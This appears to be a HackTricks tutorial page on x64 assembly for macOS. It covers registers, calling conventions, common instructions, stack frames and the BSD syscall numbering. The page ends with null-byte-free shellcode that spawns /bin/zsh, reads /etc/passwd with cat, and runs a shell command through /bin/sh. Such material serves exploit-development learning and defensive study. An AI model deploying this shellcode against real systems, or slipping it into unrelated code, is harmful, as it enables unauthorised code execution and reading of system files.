Learn & practice AWS Hacking:
Learn & practice GCP Hacking:
Support HackTricks
Check the !
Join the 💬 or the or follow us on Twitter 🐦 .
Share hacking tricks by submitting PRs to the and github repos.
Introduction to x64
x64, also known as x86-64, is a 64-bit processor architecture predominantly used in desktop and server computing. Originating from the x86 architecture produced by Intel and later adopted by AMD with the name AMD64, it's the prevalent architecture in personal computers and servers today.
Registers
x64 expands upon the x86 architecture, featuring 16 general-purpose registers labeled rax, rbx, rcx, rdx, rbp, rsp, rsi, rdi, and r8 through r15. Each of these can store a 64-bit (8-byte) value. These registers also have 32-bit, 16-bit, and 8-bit sub-registers for compatibility and specific tasks.
rax - Traditionally used for return values from functions.
rbx - Often used as a base register for memory operations.
rcx - Commonly used for loop counters.
rdx - Used in various roles including extended arithmetic operations.
rbp - Base pointer for the stack frame.
rsp - Stack pointer, keeping track of the top of the stack.
rsi and rdi - Used for source and destination indexes in string/memory operations.
r8 to r15 - Additional general-purpose registers introduced in x64.
Calling Convention
The x64 calling convention varies between operating systems. For instance:
Windows: The first four parameters are passed in the registers rcx, rdx, r8, and r9. Further parameters are pushed onto the stack. The return value is in rax.
System V (commonly used in UNIX-like systems): The first six integer or pointer parameters are passed in registers rdi, rsi, rdx, rcx, r8, and r9. The return value is also in rax.
If the function has more than six inputs, the rest will be passed on the stack. RSP, the stack pointer, has to be 16 bytes aligned, which means that the address it points to must be divisible by 16 before any call happens. This means that normally we would need to ensure that RSP is properly aligned in our shellcode before we make a function call. However, in practice, system calls work many times even if this requirement is not met.
Calling Convention in Swift
Common Instructions
x64 instructions have a rich set, maintaining compatibility with earlier x86 instructions and introducing new ones.
mov: Move a value from one register or memory location to another.
Example: mov rax, rbx — Moves the value from rbx to rax.
push and pop: Push or pop values to/from the stack.
Example: push rax — Pushes the value in rax onto the stack.
Example: pop rax — Pops the top value from the stack into rax.
add and sub: Addition and subtraction operations.
Example: add rax, rcx — Adds the values in rax and rcx storing the result in rax.
mul and div: Multiplication and division operations. Note: these have specific behaviors regarding operand usage.
call and ret: Used to call and return from functions.
int: Used to trigger a software interrupt. E.g., int 0x80 was used for system calls in 32-bit x86 Linux.
cmp: Compare two values and set the CPU's flags based on the result.
Example: cmp rax, rdx — Compares rax to rdx.
je, jne, jl, jge, ...: Conditional jump instructions that change control flow based on the results of a previous cmp or test.
Example: After a cmp rax, rdx instruction, je label — Jumps to label if rax is equal to rdx.
syscall: Used for system calls in some x64 systems (like modern Unix).
sysenter: An optimized system call instruction on some platforms.
Function Prologue
Push the old base pointer: push rbp (saves the caller's base pointer)
Move the current stack pointer to the base pointer: mov rbp, rsp (sets up the new base pointer for the current function)
Allocate space on the stack for local variables: sub rsp, <size> (where <size> is the number of bytes needed)
Function Epilogue
Move the current base pointer to the stack pointer: mov rsp, rbp (deallocate local variables)
Pop the old base pointer off the stack: pop rbp (restores the caller's base pointer)
0 AUE_NULL ALL { int nosys(void); } { indirect syscall }
1 AUE_EXIT ALL { void exit(int rval); }
2 AUE_FORK ALL { int fork(void); }
3 AUE_NULL ALL { user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); }
4 AUE_NULL ALL { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); }
5 AUE_OPEN_RWTC ALL { int open(user_addr_t path, int flags, int mode); }
6 AUE_CLOSE ALL { int close(int fd); }
7 AUE_WAIT4 ALL { int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); }
8 AUE_NULL ALL { int nosys(void); } { old creat }
9 AUE_LINK ALL { int link(user_addr_t path, user_addr_t link); }
10 AUE_UNLINK ALL { int unlink(user_addr_t path); }
11 AUE_NULL ALL { int nosys(void); } { old execv }
12 AUE_CHDIR ALL { int chdir(user_addr_t path); }
[...]
So in order to call the open syscall (5) from the Unix/BSD class you need to add it: 0x2000000
So, the syscall number to call open would be 0x2000005
bits 64
global _main
_main:
call r_cmd64
db '/bin/zsh', 0
r_cmd64: ; the call placed a pointer to db (argv[2])
pop rdi ; arg1 from the stack placed by the call to l_cmd64
xor rdx, rdx ; store null arg3
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall
bits 64
global _main
_main:
xor rdx, rdx ; zero our RDX
push rdx ; push NULL string terminator
mov rbx, '/bin/zsh' ; move the path into RBX
push rbx ; push the path, to the stack
mov rdi, rsp ; store the stack pointer in RDI (arg1)
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall
Read with cat
The goal is to execute execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL), so the second argument (x1) is an array of params (which in memory these means a stack of the addresses).
bits 64
section .text
global _main
_main:
; Prepare the arguments for the execve syscall
sub rsp, 40 ; Allocate space on the stack similar to `sub sp, sp, #48`
lea rdi, [rel cat_path] ; rdi will hold the address of "/bin/cat"
lea rsi, [rel passwd_path] ; rsi will hold the address of "/etc/passwd"
; Create inside the stack the array of args: ["/bin/cat", "/etc/passwd"]
push rsi ; Add "/etc/passwd" to the stack (arg0)
push rdi ; Add "/bin/cat" to the stack (arg1)
; Set in the 2nd argument of exec the addr of the array
mov rsi, rsp ; argv=rsp - store RSP's value in RSI
xor rdx, rdx ; Clear rdx to hold NULL (no environment variables)
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall ; Make the syscall
section .data
cat_path: db "/bin/cat", 0
passwd_path: db "/etc/passwd", 0
Invoke command with sh
bits 64
section .text
global _main
_main:
; Prepare the arguments for the execve syscall
sub rsp, 32 ; Create space on the stack
; Argument array
lea rdi, [rel touch_command]
push rdi ; push &"touch /tmp/lalala"
lea rdi, [rel sh_c_option]
push rdi ; push &"-c"
lea rdi, [rel sh_path]
push rdi ; push &"/bin/sh"
; execve syscall
mov rsi, rsp ; rsi = pointer to argument array
xor rdx, rdx ; rdx = NULL (no env variables)
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall
_exit:
xor rdi, rdi ; Exit status code 0
push 1 ; put 1 on the stack (exit syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall
section .data
sh_path: db "/bin/sh", 0
sh_c_option: db "-c", 0
touch_command: db "touch /tmp/lalala", 0
